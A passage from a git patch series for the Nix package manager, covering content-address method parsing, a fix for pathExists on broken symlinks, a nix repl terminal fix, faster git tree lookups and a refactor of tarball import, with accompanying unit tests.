                 auto hashAlgo = hashAlgo_; // work around clang bug
                 FramedSource source(from);
                 // TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store.
diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc
index 393806652..36042c06c 100644
--- a/src/libstore/derivations.cc
+++ b/src/libstore/derivations.cc
@@ -601,7 +601,7 @@ std::string Derivation::unparse(const StoreDirConfig & store, bool maskOutputs,
             },
             [&](const DerivationOutput::CAFloating & dof) {
                 s += ','; printUnquotedString(s, "");
-                s += ','; printUnquotedString(s, dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo));
+                s += ','; printUnquotedString(s, std::string { dof.method.renderPrefix() } + printHashAlgo(dof.hashAlgo));
                 s += ','; printUnquotedString(s, "");
             },
             [&](const DerivationOutput::Deferred &) {
@@ -612,7 +612,7 @@ std::string Derivation::unparse(const StoreDirConfig & store, bool maskOutputs,
             [&](const DerivationOutput::Impure & doi) {
                 // FIXME
                 s += ','; printUnquotedString(s, "");
-                s += ','; printUnquotedString(s, doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo));
+                s += ','; printUnquotedString(s, std::string { doi.method.renderPrefix() } + printHashAlgo(doi.hashAlgo));
                 s += ','; printUnquotedString(s, "impure");
             }
         }, i.second.raw);
@@ -984,7 +984,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva
             },
             [&](const DerivationOutput::CAFloating & dof) {
                 out << ""
-                    << (dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo))
+                    << (std::string { dof.method.renderPrefix() } + printHashAlgo(dof.hashAlgo))
                     << "";
             },
             [&](const DerivationOutput::Deferred &) {
@@ -994,7 +994,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva
             },
             [&](const DerivationOutput::Impure & doi) {
                 out << ""
-                    << (doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo))
+                    << (std::string { doi.method.renderPrefix() } + printHashAlgo(doi.hashAlgo))
                     << "impure";
             },
         }, i.second.raw);
@@ -1221,11 +1221,11 @@ nlohmann::json DerivationOutput::toJSON(
             // FIXME print refs?
         },
         [&](const DerivationOutput::CAFloating & dof) {
-            res["hashAlgo"] = dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo);
+            res["hashAlgo"] = std::string { dof.method.renderPrefix() } + printHashAlgo(dof.hashAlgo);
         },
         [&](const DerivationOutput::Deferred &) {},
         [&](const DerivationOutput::Impure & doi) {
-            res["hashAlgo"] = doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo);
+            res["hashAlgo"] = std::string { doi.method.renderPrefix() } + printHashAlgo(doi.hashAlgo);
             res["impure"] = true;
         },
     }, raw);
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index ccf95beef..fadef45ff 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -435,7 +435,7 @@ ref RemoteStore::addCAToStore(
         conn->to
             << WorkerProto::Op::AddToStore
             << name
-            << caMethod.render(hashAlgo);
+            << caMethod.renderWithAlgo(hashAlgo);
         WorkerProto::write(*this, *conn, references);
         conn->to << repair;
 
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 9917986f6..6ea7b2ab4 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -3,6 +3,31 @@
 
 namespace nix {
 
+FileIngestionMethod parseFileIngestionMethod(std::string_view input)
+{
+    if (input == "flat") {
+        return FileIngestionMethod::Flat;
+    } else if (input == "nar") {
+        return FileIngestionMethod::Recursive;
+    } else {
+        throw UsageError("Unknown file ingestion method '%s', expect `flat` or `nar`");
+    }
+}
+
+
+std::string_view renderFileIngestionMethod(FileIngestionMethod method)
+{
+    switch (method) {
+    case FileIngestionMethod::Flat:
+        return "flat";
+    case FileIngestionMethod::Recursive:
+        return "nar";
+    default:
+        assert(false);
+    }
+}
+
+
 void dumpPath(
     SourceAccessor & accessor, const CanonPath & path,
     Sink & sink,
diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh
index 7f7544e41..41f23f2af 100644
--- a/src/libutil/file-content-address.hh
+++ b/src/libutil/file-content-address.hh
@@ -23,6 +23,23 @@ enum struct FileIngestionMethod : uint8_t {
     Recursive = 1,
 };
 
+/**
+ * Parse a `FileIngestionMethod` by name. Choice of:
+ *
+ *  - `flat`: `FileIngestionMethod::Flat`
+ *  - `nar`: `FileIngestionMethod::Recursive`
+ *
+ * Opposite of `renderFileIngestionMethod`.
+ */
+FileIngestionMethod parseFileIngestionMethod(std::string_view input);
+
+/**
+ * Render a `FileIngestionMethod` by name.
+ *
+ * Opposite of `parseFileIngestionMethod`.
+ */
+std::string_view renderFileIngestionMethod(FileIngestionMethod method);
+
 /**
  * Dump a serialization of the given file system object.
  */
diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc
index d3e66dc21..9ea37ab4c 100644
--- a/src/nix/add-to-store.cc
+++ b/src/nix/add-to-store.cc
@@ -6,17 +6,6 @@
 
 using namespace nix;
 
-static FileIngestionMethod parseIngestionMethod(std::string_view input)
-{
-    if (input == "flat") {
-        return FileIngestionMethod::Flat;
-    } else if (input == "nar") {
-        return FileIngestionMethod::Recursive;
-    } else {
-        throw UsageError("Unknown hash mode '%s', expect `flat` or `nar`");
-    }
-}
-
 struct CmdAddToStore : MixDryRun, StoreCommand
 {
     Path path;
@@ -49,7 +38,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand
             )",
             .labels = {"hash-mode"},
             .handler = {[this](std::string s) {
-                this->caMethod = parseIngestionMethod(s);
+                this->caMethod = parseFileIngestionMethod(s);
             }},
         });
 
diff --git a/tests/unit/libstore/content-address.cc b/tests/unit/libstore/content-address.cc
new file mode 100644
index 000000000..98c1eace3
--- /dev/null
+++ b/tests/unit/libstore/content-address.cc
@@ -0,0 +1,35 @@
+#include <gtest/gtest.h>
+
+#include "content-address.hh"
+
+namespace nix {
+
+/* ----------------------------------------------------------------------------
+ * ContentAddressMethod::parse, ContentAddressMethod::render
+ * --------------------------------------------------------------------------*/
+
+TEST(ContentAddressMethod, testRoundTripPrintParse_1) {
+    for (const ContentAddressMethod & cam : {
+        ContentAddressMethod { TextIngestionMethod {} },
+        ContentAddressMethod { FileIngestionMethod::Flat },
+        ContentAddressMethod { FileIngestionMethod::Recursive },
+    }) {
+        EXPECT_EQ(ContentAddressMethod::parse(cam.render()), cam);
+    }
+}
+
+TEST(ContentAddressMethod, testRoundTripPrintParse_2) {
+    for (const std::string_view camS : {
+        "text",
+        "flat",
+        "nar",
+    }) {
+        EXPECT_EQ(ContentAddressMethod::parse(camS).render(), camS);
+    }
+}
+
+TEST(ContentAddressMethod, testParseContentAddressMethodOptException) {
+    EXPECT_THROW(ContentAddressMethod::parse("narwhal"), UsageError);
+}
+
+}
diff --git a/tests/unit/libutil/file-content-address.cc b/tests/unit/libutil/file-content-address.cc
new file mode 100644
index 000000000..2e819ce40
--- /dev/null
+++ b/tests/unit/libutil/file-content-address.cc
@@ -0,0 +1,33 @@
+#include <gtest/gtest.h>
+
+#include "file-content-address.hh"
+
+namespace nix {
+
+/* ----------------------------------------------------------------------------
+ * parseFileIngestionMethod, renderFileIngestionMethod
+ * --------------------------------------------------------------------------*/
+
+TEST(FileIngestionMethod, testRoundTripPrintParse_1) {
+    for (const FileIngestionMethod fim : {
+        FileIngestionMethod::Flat,
+        FileIngestionMethod::Recursive,
+    }) {
+        EXPECT_EQ(parseFileIngestionMethod(renderFileIngestionMethod(fim)), fim);
+    }
+}
+
+TEST(FileIngestionMethod, testRoundTripPrintParse_2) {
+    for (const std::string_view fimS : {
+        "flat",
+        "nar",
+    }) {
+        EXPECT_EQ(renderFileIngestionMethod(parseFileIngestionMethod(fimS)), fimS);
+    }
+}
+
+TEST(FileIngestionMethod, testParseFileIngestionMethodOptException) {
+    EXPECT_THROW(parseFileIngestionMethod("narwhal"), UsageError);
+}
+
+}

From db41a0616a42f8fb52b189f7fd05c2f09764426f Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Tue, 13 Feb 2024 11:14:49 -0500
Subject: [PATCH 469/654] Use `ContentAddressMethod::render` in one more place

Good to deduplicate the code.
---
 src/libfetchers/fetch-to-store.cc | 18 ++----------------
 1 file changed, 2 insertions(+), 16 deletions(-)

diff --git a/src/libfetchers/fetch-to-store.cc b/src/libfetchers/fetch-to-store.cc
index 196489e05..c27880662 100644
--- a/src/libfetchers/fetch-to-store.cc
+++ b/src/libfetchers/fetch-to-store.cc
@@ -21,23 +21,9 @@ StorePath fetchToStore(
         cacheKey = fetchers::Attrs{
             {"_what", "fetchToStore"},
             {"store", store.storeDir},
-            {"name", std::string(name)},
+            {"name", std::string{name}},
             {"fingerprint", *path.accessor->fingerprint},
-            {
-                "method",
-                std::visit(overloaded {
-                    [](const TextIngestionMethod &) {
-                        return "text";
-                    },
-                    [](const FileIngestionMethod & fim) {
-                        switch (fim) {
-                        case FileIngestionMethod::Flat: return "flat";
-                        case FileIngestionMethod::Recursive: return "nar";
-                        default: assert(false);
-                        }
-                    },
-                }, method.raw),
-            },
+            {"method", std::string{method.render()}},
             {"path", path.path.abs()}
         };
         if (auto res = fetchers::getCache()->lookup(store, *cacheKey)) {

From 89e21ab4bd1561c6eab2eeb63088f4e34fa4059f Mon Sep 17 00:00:00 2001
From: Alois Wohlschlager 
Date: Sat, 10 Feb 2024 20:56:54 +0100
Subject: [PATCH 470/654] Restore `builtins.pathExists` behavior on broken
 symlinks

Commit 83c067c0fa0cc5a2dca440e5c986afe40b163802 changed `builtins.pathExists`
to resolve symlinks before checking for existence. Consequently, if the path
refers to a symlink itself, existence of the target of the symlink (instead of
the symlink itself) was checked. Restore the previous behavior by skipping
symlink resolution in the last component.
---
 src/libexpr/primops.cc                        | 15 +++++++-----
 src/libutil/source-path.cc                    | 22 ++++++++++-------
 src/libutil/source-path.hh                    | 24 +++++++++++++++----
 .../functional/lang/eval-okay-pathexists.nix  |  3 +++
 .../functional/lang/symlink-resolution/broken |  1 +
 5 files changed, 46 insertions(+), 19 deletions(-)
 create mode 120000 tests/functional/lang/symlink-resolution/broken

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 8c6aeffac..dde7c0fe7 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -115,7 +115,7 @@ StringMap EvalState::realiseContext(const NixStringContext & context)
     return res;
 }
 
-static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, bool resolveSymlinks = true)
+static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, std::optional<SymlinkResolution> resolveSymlinks = SymlinkResolution::Full)
 {
     NixStringContext context;
 
@@ -127,7 +127,7 @@ static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, bo
             auto realPath = state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context);
             path = {path.accessor, CanonPath(realPath)};
         }
-        return resolveSymlinks ? path.resolveSymlinks() : path;
+        return resolveSymlinks ? path.resolveSymlinks(*resolveSymlinks) : path;
     } catch (Error & e) {
         e.addTrace(state.positions[pos], "while realising the context of path '%s'", path);
         throw;
@@ -167,7 +167,7 @@ static void mkOutputString(
    argument. */
 static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * vScope, Value & v)
 {
-    auto path = realisePath(state, pos, vPath, false);
+    auto path = realisePath(state, pos, vPath, std::nullopt);
     auto path2 = path.path.abs();
 
     // FIXME
@@ -1521,13 +1521,16 @@ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args,
     try {
         auto & arg = *args[0];
 
-        auto path = realisePath(state, pos, arg);
-
         /* SourcePath doesn't know about trailing slash. */
+        state.forceValue(arg, pos);
         auto mustBeDir = arg.type() == nString
             && (arg.string_view().ends_with("/")
                 || arg.string_view().ends_with("/."));
 
+        auto symlinkResolution =
+            mustBeDir ? SymlinkResolution::Full : SymlinkResolution::Ancestors;
+        auto path = realisePath(state, pos, arg, symlinkResolution);
+
         auto st = path.maybeLstat();
         auto exists = st && (!mustBeDir || st->type == SourceAccessor::tDirectory);
         v.mkBool(exists);
@@ -1765,7 +1768,7 @@ static std::string_view fileTypeToString(InputAccessor::Type type)
 
 static void prim_readFileType(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 {
-    auto path = realisePath(state, pos, *args[0], false);
+    auto path = realisePath(state, pos, *args[0], std::nullopt);
     /* Retrieve the directory entry type and stringize it. */
     v.mkString(fileTypeToString(path.lstat().type));
 }
diff --git a/src/libutil/source-path.cc b/src/libutil/source-path.cc
index 341daf39c..66c95405f 100644
--- a/src/libutil/source-path.cc
+++ b/src/libutil/source-path.cc
@@ -62,7 +62,7 @@ bool SourcePath::operator<(const SourcePath & x) const
     return std::tie(*accessor, path) < std::tie(*x.accessor, x.path);
 }
 
-SourcePath SourcePath::resolveSymlinks() const
+SourcePath SourcePath::resolveSymlinks(SymlinkResolution mode) const
 {
     auto res = SourcePath(accessor);
 
@@ -72,6 +72,8 @@ SourcePath SourcePath::resolveSymlinks() const
     for (auto & c : path)
         todo.push_back(std::string(c));
 
+    bool resolve_last = mode == SymlinkResolution::Full;
+
     while (!todo.empty()) {
         auto c = *todo.begin();
         todo.pop_front();
@@ -81,14 +83,16 @@ SourcePath SourcePath::resolveSymlinks() const
             res.path.pop();
         else {
             res.path.push(c);
-            if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) {
-                if (!linksAllowed--)
-                    throw Error("infinite symlink recursion in path '%s'", path);
-                auto target = res.readLink();
-                res.path.pop();
-                if (hasPrefix(target, "/"))
-                    res.path = CanonPath::root;
-                todo.splice(todo.begin(), tokenizeString<std::list<std::string>>(target, "/"));
+            if (resolve_last || !todo.empty()) {
+                if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) {
+                    if (!linksAllowed--)
+                        throw Error("infinite symlink recursion in path '%s'", path);
+                    auto target = res.readLink();
+                    res.path.pop();
+                    if (hasPrefix(target, "/"))
+                        res.path = CanonPath::root;
+                    todo.splice(todo.begin(), tokenizeString<std::list<std::string>>(target, "/"));
+                }
             }
         }
     }
diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh
index bde07b08f..b4cfa9ce8 100644
--- a/src/libutil/source-path.hh
+++ b/src/libutil/source-path.hh
@@ -11,6 +11,22 @@
 
 namespace nix {
 
+enum class SymlinkResolution {
+    /**
+     * Resolve symlinks in the ancestors only.
+     *
+     * Only the last component of the result is possibly a symlink.
+     */
+    Ancestors,
+
+    /**
+     * Resolve symlinks fully, realpath(3)-style.
+     *
+     * No component of the result will be a symlink.
+     */
+    Full,
+};
+
 /**
  * An abstraction for accessing source files during
  * evaluation. Currently, it's just a wrapper around `CanonPath` that
@@ -103,11 +119,11 @@ struct SourcePath
     bool operator<(const SourcePath & x) const;
 
     /**
-     * Resolve any symlinks in this `SourcePath` (including its
-     * parents). The result is a `SourcePath` in which no element is a
-     * symlink.
+     * Resolve any symlinks in this `SourcePath` according to the
+     * given resolution mode.
      */
-    SourcePath resolveSymlinks() const;
+    SourcePath resolveSymlinks(
+        SymlinkResolution mode = SymlinkResolution::Full) const;
 };
 
 std::ostream & operator << (std::ostream & str, const SourcePath & path);
diff --git a/tests/functional/lang/eval-okay-pathexists.nix b/tests/functional/lang/eval-okay-pathexists.nix
index 31697f66a..022b22fea 100644
--- a/tests/functional/lang/eval-okay-pathexists.nix
+++ b/tests/functional/lang/eval-okay-pathexists.nix
@@ -29,3 +29,6 @@ builtins.pathExists (./lib.nix)
 && builtins.pathExists (builtins.toPath { outPath = builtins.toString ./lib.nix; })
 && builtins.pathExists ./lib.nix
 && !builtins.pathExists ./bla.nix
+&& builtins.pathExists ./symlink-resolution/foo/overlays/overlay.nix
+&& builtins.pathExists ./symlink-resolution/broken
+&& builtins.pathExists (builtins.toString ./symlink-resolution/foo/overlays + "/.")
diff --git a/tests/functional/lang/symlink-resolution/broken b/tests/functional/lang/symlink-resolution/broken
new file mode 120000
index 000000000..e07da690b
--- /dev/null
+++ b/tests/functional/lang/symlink-resolution/broken
@@ -0,0 +1 @@
+nonexistent
\ No newline at end of file

From 9d64613dcac181f889f6831a08404e2483d41da4 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Tue, 13 Feb 2024 12:50:10 -0500
Subject: [PATCH 471/654] Update src/libutil/file-content-address.cc

---
 src/libutil/file-content-address.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 6ea7b2ab4..6753e0f49 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -23,7 +23,7 @@ std::string_view renderFileIngestionMethod(FileIngestionMethod method)
     case FileIngestionMethod::Recursive:
         return "nar";
     default:
-        assert(false);
+        abort();
     }
 }
 

From a694cfb7bd6fadc9b0c385551c0255ec5c0da068 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Tue, 13 Feb 2024 11:09:12 -0800
Subject: [PATCH 472/654] Fix "Failed tcsetattr(TCSADRAIN)" when `nix repl` is
 not a TTY

Before:
```
$ echo builtins.nixVersion | nix repl
Welcome to Nix 2.18.1. Type :? for help.

Failed tcsetattr(TCSADRAIN): Inappropriate ioctl for device
"2.18.1"

Failed tcsetattr(TCSADRAIN): Inappropriate ioctl for device
```

After:
```
$ echo builtins.nixVersion | nix repl
Nix 2.21.0pre20240131_dirty
Type :? for help.
"2.21.0pre20240131_dirty"
```
---
 src/libcmd/repl.cc | 1 -
 1 file changed, 1 deletion(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 26b032693..a7cd15efe 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -351,7 +351,6 @@ bool NixRepl::getLine(std::string & input, const std::string & prompt)
     };
 
     setupSignals();
-    Finally resetTerminal([&]() { rl_deprep_terminal(); });
     char * s = readline(prompt.c_str());
     Finally doFree([&]() { free(s); });
     restoreSignals();

From 6d2b446e2b71d288f0f9e02270c948f66516f33e Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Wed, 14 Feb 2024 08:49:47 -0800
Subject: [PATCH 473/654] Add release notes for "Pretty print values in `nix
 repl`"

---
 .../rl-next/pretty-print-in-nix-repl.md       | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 doc/manual/rl-next/pretty-print-in-nix-repl.md

diff --git a/doc/manual/rl-next/pretty-print-in-nix-repl.md b/doc/manual/rl-next/pretty-print-in-nix-repl.md
new file mode 100644
index 000000000..26ba5162a
--- /dev/null
+++ b/doc/manual/rl-next/pretty-print-in-nix-repl.md
@@ -0,0 +1,24 @@
+---
+synopsis: "`nix repl` pretty-prints values"
+prs: 9931
+---
+
+`nix repl` will now pretty-print values:
+
+```
+{
+  attrs = {
+    a = {
+      b = {
+        c = { };
+      };
+    };
+  };
+  list = [ 1 ];
+  list' = [
+    1
+    2
+    3
+  ];
+}
+```

From 67a6d344487af252d25001b5c43409b56b33ac9d Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Wed, 14 Feb 2024 19:07:18 +0100
Subject: [PATCH 474/654] GitInputAccessor: Speed up lookup()

A command like

  rm -rf ~/.cache/nix/tarball-cache/ ~/.cache/nix/fetcher-cache-v1.sqlite*; nix flake metadata 'git+file:///home/eelco/Dev/nixpkgs?rev=9463103069725474698139ab10f17a9d125da859'

was spending about 84% of its runtime in lookup(), specifically in
git_tree_entry_bypath(). (The reading of blobs is less than 3%.)

It appears libgit2 doesn't do a lot of caching of trees, so we now
make sure that when we look up a path, we add all its parents, and all
the immediate children of the parents (since we have them in memory
anyway), to our own cache.

This speed up the command above from 17.2s to 7.8s on my machine.

Fixes (or at least should improve a lot) #9684.
---
 src/libfetchers/git-utils.cc | 61 ++++++++++++++++++++++++++++++------
 1 file changed, 51 insertions(+), 10 deletions(-)

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index cb4a84e53..466bdc6c7 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -576,20 +576,61 @@ struct GitInputAccessor : InputAccessor
     /* Recursively look up 'path' relative to the root. */
     git_tree_entry * lookup(const CanonPath & path)
     {
-        if (path.isRoot()) return nullptr;
-
         auto i = lookupCache.find(path);
-        if (i == lookupCache.end()) {
-            TreeEntry entry;
-            if (auto err = git_tree_entry_bypath(Setter(entry), root.get(), std::string(path.rel()).c_str())) {
-                if (err != GIT_ENOTFOUND)
-                    throw Error("looking up '%s': %s", showPath(path), git_error_last()->message);
-            }
+        if (i != lookupCache.end()) return i->second.get();
 
-            i = lookupCache.emplace(path, std::move(entry)).first;
+        auto parent = path.parent();
+        if (!parent) return nullptr;
+
+        auto name = path.baseName().value();
+
+        auto parentTree = lookupTree(*parent);
+        if (!parentTree) return nullptr;
+
+        auto count = git_tree_entrycount(parentTree->get());
+
+        git_tree_entry * res = nullptr;
+
+        /* Add all the tree entries to the cache to speed up
+           subsequent lookups. */
+        for (size_t n = 0; n < count; ++n) {
+            auto entry = git_tree_entry_byindex(parentTree->get(), n);
+
+            TreeEntry copy;
+            if (git_tree_entry_dup(Setter(copy), entry))
+                throw Error("dupping tree entry: %s", git_error_last()->message);
+
+            auto entryName = std::string_view(git_tree_entry_name(entry));
+
+            if (entryName == name)
+                res = copy.get();
+
+            auto path2 = *parent;
+            path2.push(entryName);
+            lookupCache.emplace(path2, std::move(copy)).first->second.get();
         }
 
-        return &*i->second;
+        return res;
+    }
+
+    std::optional<Tree> lookupTree(const CanonPath & path)
+    {
+        if (path.isRoot()) {
+            Tree tree;
+            if (git_tree_dup(Setter(tree), root.get()))
+                throw Error("duplicating directory '%s': %s", showPath(path), git_error_last()->message);
+            return tree;
+        }
+
+        auto entry = lookup(path);
+        if (!entry || git_tree_entry_type(entry) != GIT_OBJECT_TREE)
+            return std::nullopt;
+
+        Tree tree;
+        if (git_tree_entry_to_object((git_object * *) (git_tree * *) Setter(tree), *repo, entry))
+            throw Error("looking up directory '%s': %s", showPath(path), git_error_last()->message);
+
+        return tree;
     }
 
     git_tree_entry * need(const CanonPath & path)

From ba6a5f06eeaeb2a81f4e6871b8ef19927987409e Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Thu, 21 Dec 2023 03:49:52 -0500
Subject: [PATCH 475/654] Split `GitRepoImpl::importTarball`

There is now a separation of:

1. A `FileSystemObjectSink` for writing to git repos

2. Adapting libarchive to use that parse sink.

This prepares a proper separation of concerns.
---
 src/libfetchers/git-utils.cc | 388 +++++++++++++++++++++--------------
 src/libfetchers/git-utils.hh |  15 +-
 src/libutil/fs-sink.hh       |   2 +
 3 files changed, 249 insertions(+), 156 deletions(-)

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 51631e769..980a5a4d7 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -7,6 +7,7 @@
 #include "processes.hh"
 #include "signals.hh"
 #include "users.hh"
+#include "fs-sink.hh"
 
 #include 
 #include 
@@ -23,9 +24,6 @@
 #include 
 #include 
 
-#include "tarfile.hh"
-#include <archive_entry.h>
-
 #include 
 #include 
 #include 
@@ -317,157 +315,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
         return std::nullopt;
     }
 
-    TarballInfo importTarball(Source & source) override
-    {
-        TarArchive archive(source);
-
-        struct PendingDir
-        {
-            std::string name;
-            TreeBuilder builder;
-        };
-
-        std::vector<PendingDir> pendingDirs;
-
-        auto pushBuilder = [&](std::string name)
-        {
-            git_treebuilder * b;
-            if (git_treebuilder_new(&b, *this, nullptr))
-                throw Error("creating a tree builder: %s", git_error_last()->message);
-            pendingDirs.push_back({ .name = std::move(name), .builder = TreeBuilder(b) });
-        };
-
-        auto popBuilder = [&]() -> std::pair<git_oid, std::string>
-        {
-            assert(!pendingDirs.empty());
-            auto pending = std::move(pendingDirs.back());
-            git_oid oid;
-            if (git_treebuilder_write(&oid, pending.builder.get()))
-                throw Error("creating a tree object: %s", git_error_last()->message);
-            pendingDirs.pop_back();
-            return {oid, pending.name};
-        };
-
-        auto addToTree = [&](const std::string & name, const git_oid & oid, git_filemode_t mode)
-        {
-            assert(!pendingDirs.empty());
-            auto & pending = pendingDirs.back();
-            if (git_treebuilder_insert(nullptr, pending.builder.get(), name.c_str(), &oid, mode))
-                throw Error("adding a file to a tree builder: %s", git_error_last()->message);
-        };
-
-        auto updateBuilders = [&](std::span<const std::string> names)
-        {
-            // Find the common prefix of pendingDirs and names.
-            size_t prefixLen = 0;
-            for (; prefixLen < names.size() && prefixLen + 1 < pendingDirs.size(); ++prefixLen)
-                if (names[prefixLen] != pendingDirs[prefixLen + 1].name)
-                    break;
-
-            // Finish the builders that are not part of the common prefix.
-            for (auto n = pendingDirs.size(); n > prefixLen + 1; --n) {
-                auto [oid, name] = popBuilder();
-                addToTree(name, oid, GIT_FILEMODE_TREE);
-            }
-
-            // Create builders for the new directories.
-            for (auto n = prefixLen; n < names.size(); ++n)
-                pushBuilder(names[n]);
-        };
-
-        pushBuilder("");
-
-        size_t componentsToStrip = 1;
-
-        time_t lastModified = 0;
-
-        for (;;) {
-            // FIXME: merge with extract_archive
-            struct archive_entry * entry;
-            int r = archive_read_next_header(archive.archive, &entry);
-            if (r == ARCHIVE_EOF) break;
-            auto path = archive_entry_pathname(entry);
-            if (!path)
-                throw Error("cannot get archive member name: %s", archive_error_string(archive.archive));
-            if (r == ARCHIVE_WARN)
-                warn(archive_error_string(archive.archive));
-            else
-                archive.check(r);
-
-            lastModified = std::max(lastModified, archive_entry_mtime(entry));
-
-            auto pathComponents = tokenizeString<std::vector<std::string>>(path, "/");
-
-            std::span<const std::string> pathComponents2{pathComponents};
-
-            if (pathComponents2.size() <= componentsToStrip) continue;
-            pathComponents2 = pathComponents2.subspan(componentsToStrip);
-
-            updateBuilders(
-                archive_entry_filetype(entry) == AE_IFDIR
-                ? pathComponents2
-                : pathComponents2.first(pathComponents2.size() - 1));
-
-            switch (archive_entry_filetype(entry)) {
-
-            case AE_IFDIR:
-                // Nothing to do right now.
-                break;
-
-            case AE_IFREG: {
-
-                git_writestream * stream = nullptr;
-                if (git_blob_create_from_stream(&stream, *this, nullptr))
-                    throw Error("creating a blob stream object: %s", git_error_last()->message);
-
-                while (true) {
-                    std::vector<unsigned char> buf(128 * 1024);
-                    auto n = archive_read_data(archive.archive, buf.data(), buf.size());
-                    if (n < 0)
-                        throw Error("cannot read file '%s' from tarball", path);
-                    if (n == 0) break;
-                    if (stream->write(stream, (const char *) buf.data(), n))
-                        throw Error("writing a blob for tarball member '%s': %s", path, git_error_last()->message);
-                }
-
-                git_oid oid;
-                if (git_blob_create_from_stream_commit(&oid, stream))
-                    throw Error("creating a blob object for tarball member '%s': %s", path, git_error_last()->message);
-
-                addToTree(*pathComponents.rbegin(), oid,
-                    archive_entry_mode(entry) & S_IXUSR
-                    ? GIT_FILEMODE_BLOB_EXECUTABLE
-                    : GIT_FILEMODE_BLOB);
-
-                break;
-            }
-
-            case AE_IFLNK: {
-                auto target = archive_entry_symlink(entry);
-
-                git_oid oid;
-                if (git_blob_create_from_buffer(&oid, *this, target, strlen(target)))
-                    throw Error("creating a blob object for tarball symlink member '%s': %s", path, git_error_last()->message);
-
-                addToTree(*pathComponents.rbegin(), oid, GIT_FILEMODE_LINK);
-
-                break;
-            }
-
-            default:
-                throw Error("file '%s' in tarball has unsupported file type", path);
-            }
-        }
-
-        updateBuilders({});
-
-        auto [oid, _name] = popBuilder();
-
-        return TarballInfo {
-            .treeHash = toHash(oid),
-            .lastModified = lastModified
-        };
-    }
+    TarballInfo importTarball(Source & source) override;
 
     std::vector<std::tuple<Submodule, Hash>> getSubmodules(const Hash & rev, bool exportIgnore) override;
 
@@ -511,6 +359,8 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
 
     ref<InputAccessor> getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError e) override;
 
+    ref<GitFileSystemObjectSink> getFileSystemObjectSink() override;
+
     static int sidebandProgressCallback(const char * str, int len, void * payload)
     {
         auto act = (Activity *) payload;
@@ -884,6 +734,154 @@ struct GitExportIgnoreInputAccessor : CachingFilteringInputAccessor {
 
 };
 
+struct GitFileSystemObjectSinkImpl : GitFileSystemObjectSink
+{
+    ref<GitRepoImpl> repo;
+
+    struct PendingDir
+    {
+        std::string name;
+        TreeBuilder builder;
+    };
+
+    std::vector<PendingDir> pendingDirs;
+
+    size_t componentsToStrip = 1;
+
+    void pushBuilder(std::string name)
+    {
+        git_treebuilder * b;
+        if (git_treebuilder_new(&b, *repo, nullptr))
+            throw Error("creating a tree builder: %s", git_error_last()->message);
+        pendingDirs.push_back({ .name = std::move(name), .builder = TreeBuilder(b) });
+    };
+
+    GitFileSystemObjectSinkImpl(ref<GitRepoImpl> repo) : repo(repo)
+    {
+        pushBuilder("");
+    }
+
+    std::pair<git_oid, std::string> popBuilder()
+    {
+        assert(!pendingDirs.empty());
+        auto pending = std::move(pendingDirs.back());
+        git_oid oid;
+        if (git_treebuilder_write(&oid, pending.builder.get()))
+            throw Error("creating a tree object: %s", git_error_last()->message);
+        pendingDirs.pop_back();
+        return {oid, pending.name};
+    };
+
+    void addToTree(const std::string & name, const git_oid & oid, git_filemode_t mode)
+    {
+        assert(!pendingDirs.empty());
+        auto & pending = pendingDirs.back();
+        if (git_treebuilder_insert(nullptr, pending.builder.get(), name.c_str(), &oid, mode))
+            throw Error("adding a file to a tree builder: %s", git_error_last()->message);
+    };
+
+    void updateBuilders(std::span<const std::string> names)
+    {
+        // Find the common prefix of pendingDirs and names.
+        size_t prefixLen = 0;
